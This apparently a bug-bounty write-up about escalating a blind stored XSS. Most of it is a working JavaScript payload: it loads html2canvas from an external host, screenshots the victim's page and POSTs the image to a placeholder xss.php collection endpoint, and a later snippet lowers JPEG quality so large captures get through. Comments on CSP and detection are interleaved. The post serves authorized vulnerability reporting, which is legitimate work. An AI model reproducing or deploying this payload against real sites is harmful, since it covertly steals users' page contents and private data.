layout: post
title: 12. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS
Preface
This is the 12th short write-up recording an actual SRC engagement; the topic is an XSS bypass on a website.
Blind stored XSS
Generally, a stored XSS falls into one of two situations:
- If the affected back-end page is reachable from the public internet, the severity is rated by the sensitivity of that back-end, and it can generally be rated high risk.
- If the back-end is not reachable from the public internet and you only captured a cookie without demonstrating further impact, it will generally be rated medium risk.
- User-level stored XSS that is wormable: high risk
- Ordinary user-level stored XSS that is not wormable: medium risk
Ways to raise the severity rating
For the second case, one conceivable way to demonstrate greater impact is to capture a screenshot of the page through the XSS.
// Stage 1: inject a <script> tag that loads html2canvas from an external host
// (the host name is a placeholder in this write-up). From the defender's side, a
// restrictive CSP `script-src` (no 'unsafe-inline', no wildcard hosts) blocks both
// the document.write and the remote library load, so this line is the first point
// at which the payload can be stopped.
document.write("<script src=\"https:\/\/xxxxx\/html2canvas.js\"><\/script>");
// Stage 2: run once the page has finished loading. This assignment replaces any
// onload handler the page itself had registered.
window.onload = function () {
  // Rasterise the entire document body into a canvas.
  html2canvas(document.body, {
    onrendered: function (canvas) {
      // Original comment (translated): the captured screenshot image data is
      // transmitted and received below; because the data is very long, only
      // POST can be used.
      // Note: xhr, request and attack_a are assigned without var/let/const, so
      // they become implicit globals on the victim page.
      xhr = function () {
        // Feature-detect the XHR object; the ActiveXObject branch is a legacy
        // IE fallback.
        var request = false;
        if (window.XMLHttpRequest) {
          request = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
          try {
            request = new window.ActiveXObject('Microsoft.XMLHTTP');
          } catch (e) {
            // Swallowed: request stays false, so the later xhr.open() call
            // would fail with a TypeError.
          }
        }
        return request;
      }();
      request = function (method, src, argv, content_type) {
        // Third argument `false` makes the request synchronous, so the victim's
        // page blocks until the upload completes.
        xhr.open(method, src, false);
        if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
        xhr.send(argv); // send the POST data (translated)
        return xhr.responseText;
      };
      attack_a = function () {
        // POST receiving address (translated); `{projectId}` is a template
        // placeholder in the write-up, not a literal value.
        var src = "https://xxxx/xss.php?do=api&id={projectId}";
        // The body is a form-encoded field named `screenshot` carrying the
        // canvas data: URL. Detection hint: an outbound POST from the victim
        // origin to a third-party host whose body contains
        // `screenshot=data:image/` is a strong exfiltration signature, and a CSP
        // `connect-src` limited to first-party hosts blocks it outright.
        var argv_0 = "'&screenshot=" + canvas.toDataURL(); // POST field name is screenshot (translated)
        request("POST", src, argv_0, "application/x-www-form-urlencoded");
      };
      attack_a();
    }
  });
}
However, the problem encountered on this platform was that the image data is sometimes too large, and part of the data goes missing after the base64 conversion.
In that case, the complete picture can still be transmitted by reducing the image quality (and therefore the size) before sending it.
Solution
// Export the same canvas at three JPEG quality levels; the second argument is the
// encoder quality (0.0-1.0), and lower values produce a much shorter data: URL.
// Defender note: because even the low-quality export stays legible, body-size
// thresholds alone are not a reliable way to spot screenshot exfiltration.
var fullQuality = canvas.toDataURL("image/jpeg", 1.0);
// data:image/jpeg;base64,/9j/4AAQSkZJRgABAQ...9oADAMBAAIRAxEAPwD/AD/6AP/Z"
var mediumQuality = canvas.toDataURL("image/jpeg", 0.5);
var lowQuality = canvas.toDataURL("image/jpeg", 0.1);
In the final result, the user's data is still clearly visible.
Afterword
xxxxx